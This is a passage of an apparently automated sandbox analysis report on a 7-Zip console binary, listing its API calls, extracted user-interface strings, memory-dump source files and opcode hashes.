                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                        • Instruction ID: d848dae3f92925655011ab3d42761a1da177b78213bcfd14d9ae849b0ac96568
                                                                                                                                        • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                        • Instruction Fuzzy Hash: 09011A237219C0C9CB18FE37DC911682368AF86BA87984171FF1D4B756DE20CCAA8740
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                        • Instruction ID: 810dff0408de5bc43b9344b98c6cf0842c613d60ffb61133999d46c203d6ff9a
                                                                                                                                        • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                        • Instruction Fuzzy Hash: 02015E636209C0CACB18AE37DD912683364AFC1B98B484171BF1D0B716DE20C8A68740
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028C91C
                                                                                                                                        • fputs.MSVCRT ref: 0028C9F1
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        • fputs.MSVCRT ref: 0028CADA
                                                                                                                                          • Part of subcall function 002422E4: fflush.MSVCRT ref: 002422EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free$fflushfputcmemset
                                                                                                                                        • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                        • API String ID: 2975459029-4064182643
                                                                                                                                        • Opcode ID: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                        • Instruction ID: acce8139d7fed00f0da7fd17c879a5aa70c810ef877c467f578db93ac90082ae
                                                                                                                                        • Opcode Fuzzy Hash: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                        • Instruction Fuzzy Hash: 25616D6A7229869ACA3CFF72E45136E7720F740B84F584026EF1B07646DF38D8758720
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: : $...$Junction: $REPARSE:
                                                                                                                                        • API String ID: 1294909896-1476144188
                                                                                                                                        • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                        • Instruction ID: 7c5538923002ba10e29012b302eff65e1330e87e486cbc10b5386aedfea4013b
                                                                                                                                        • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                        • Instruction Fuzzy Hash: DB511532230A46D2CB18DF25E8413AAB765FB817A4F859022EE4F47754DFB8C595CB50
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00280E9C
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                        • fputs.MSVCRT ref: 00280F5D
                                                                                                                                        • fputs.MSVCRT ref: 00280FD8
                                                                                                                                        • fputs.MSVCRT ref: 00280FF4
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00281092
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                        • String ID: ???
                                                                                                                                        • API String ID: 2578255354-1053719742
                                                                                                                                        • Opcode ID: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                                                                                        • Instruction ID: 67af45155d6a38b1626d3d56eb6d9f32f9a4b94650e82048661ed1f736625c6a
                                                                                                                                        • Opcode Fuzzy Hash: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                                                                                        • Instruction Fuzzy Hash: EB51603A321A81A2DB5CEF22D9943EA6320F745B94F848516DF2D077A4DF38D5B9C700
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Would you like to replace the existing file:, xrefs: 00280CF0
                                                                                                                                        • with the file from archive:, xrefs: 00280D1C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                        • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                        • API String ID: 3346953513-686978020
                                                                                                                                        • Opcode ID: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                        • Instruction ID: dff7263e575b1eb100be02f29ff9fff9a7a2da5661c67e41fec30adb66c7528f
                                                                                                                                        • Opcode Fuzzy Hash: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                        • Instruction Fuzzy Hash: F2410B6A37268292D7A8AF66D8D03A97360F745B90F4881129F2D07795CF3CD87CD705
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                        • String ID: :
                                                                                                                                        • API String ID: 1989314732-3653984579
                                                                                                                                        • Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                        • Instruction ID: 03f2515da6c863f22e4b9b27e91820ba7666fc6b805012a0e29075948c28ce5b
                                                                                                                                        • Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                        • Instruction Fuzzy Hash: 71316D76211A80C1DB15EF26D84439D3320F788FA8F584232EE5E4B7A8CF78C8A9C710
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Enter password (will not be echoed):, xrefs: 0028CE69
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                                        • String ID: Enter password (will not be echoed):
                                                                                                                                        • API String ID: 108775803-3720017889
                                                                                                                                        • Opcode ID: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                                                                                        • Instruction ID: 4e54c20c57050aca413ea9666cf52685ef3a81c983febdc2703361cbeea7d204
                                                                                                                                        • Opcode Fuzzy Hash: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                                                                                        • Instruction Fuzzy Hash: 5E21D81A32760282FA28AF66ED143252361AF54BB0F388221EF1A477E4DF7CC855D710
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputsfree
                                                                                                                                        • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                                                        • API String ID: 2581285248-3393983761
                                                                                                                                        • Opcode ID: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                                                                                        • Instruction ID: bef9267aa6db9afa5521b4966846728a4aafcaa049b5c9f0e0046821306ff4f9
                                                                                                                                        • Opcode Fuzzy Hash: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                                                                                        • Instruction Fuzzy Hash: DE21D667321945D5CF24EF22E84079D6734F789BE8F840221EE1E437A5EF28C56ACB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Version$AddressHandleModuleProc
                                                                                                                                        • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                        • API String ID: 2268189529-2102062458
                                                                                                                                        • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                        • Instruction ID: 1a43f3058d2de4dfb2dfbec14106e5e7f75c5c7c800a69a7bf0209e3c7b46fde
                                                                                                                                        • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                        • Instruction Fuzzy Hash: 1CF0F839226602C6EF74AF50F9587A923A0FB98709F954225C64E416F8EF3CCA5DDB10
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                        • Instruction ID: e447f31e90a8a93983991d4ffce0d31e62ed531e98fc6e3ffb3150e8f1f05249
                                                                                                                                        • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                        • Instruction Fuzzy Hash: AE71B02323C6C186CA24EF25E44069EB764F7CA750FA49112EB9E43B59CB78C969DF01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                        • Instruction ID: 1ff397d40a0bcf07849047502dbf19257201ae14c5e91b47d43e383887e7533a
                                                                                                                                        • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                        • Instruction Fuzzy Hash: FA4119222246C0D9CF37EF25D44026D3760DB92B98F544112EB5E87796DFB9C6EACB40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: freememmove$ExceptionThrowmalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1818558235-0
                                                                                                                                        • Opcode ID: 24312198eea8112267552bd615ee2238710e5c398dba347cc122472e1d63ece1
                                                                                                                                        • Instruction ID: a9c1e5bb442cbcdc06de4efbfbb26525957dbd2800f592bc58848d2ffa1fe862
                                                                                                                                        • Opcode Fuzzy Hash: 24312198eea8112267552bd615ee2238710e5c398dba347cc122472e1d63ece1
                                                                                                                                        • Instruction Fuzzy Hash: 00312AB27212948B8B64EF7BD49252E73E4E744FD83148026EF1D97749DA24DCE6CB80
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                        • Instruction ID: 2cf1586fe8a7684e758504f42164aa5f02cd02df2430cdbe0834e4401df1f677
                                                                                                                                        • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                        • Instruction Fuzzy Hash: E6F0F92226A5D1C5CB28FF33C49566E6795FFC7F81B842461FB4E63716CE28C45ACA04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                        • Instruction ID: bef310c19be30d6222a69dca2448cb37c4755568eff19afa1fdd92429a3b5a4c
                                                                                                                                        • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                        • Instruction Fuzzy Hash: 68F0F92226A9C0C1CB28FF33C4A562E6754FBC3F85F855051BB4E23712CE28C4AACA04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                        • Instruction ID: 9d7e3aa323a29e59f109775ae64fa12c3436c41e0820c2995fbdf23b3c3784df
                                                                                                                                        • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                        • Instruction Fuzzy Hash: 7CF0FF2226A9C1C1CB18FF33C85562F6764FBC3F81F451051BB4E63712CE28C45ACA04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                        • Instruction ID: 3edcbd33bddbbf758095e0e43bc6cad56d928861e032f8a78847ceab372f553d
                                                                                                                                        • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                        • Instruction Fuzzy Hash: D2F0F92226A5C0C1CB28FF33C4A562E67A8FFC7F81B851091BB4E13712CE28C45ACA04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                        • Instruction ID: e65dce2e051885be27eb7f8c8c77876fa1a89c22d4f50749464a103adecf0acd
                                                                                                                                        • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                        • Instruction Fuzzy Hash: 04F0F92226A5D0C5CB28FF33C45562E6794FFC7F81B442461BB4E63712CE28C45ACA04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                        • Instruction ID: 316a460264654ec37a28f4919297968970e5937891902e2f22d8cd23e5b531eb
                                                                                                                                        • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                        • Instruction Fuzzy Hash: 15F0A9212659C1C5CB18FF33D45162E63A4FFC7F81B416451BB4E63712CE28C45ACA09
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
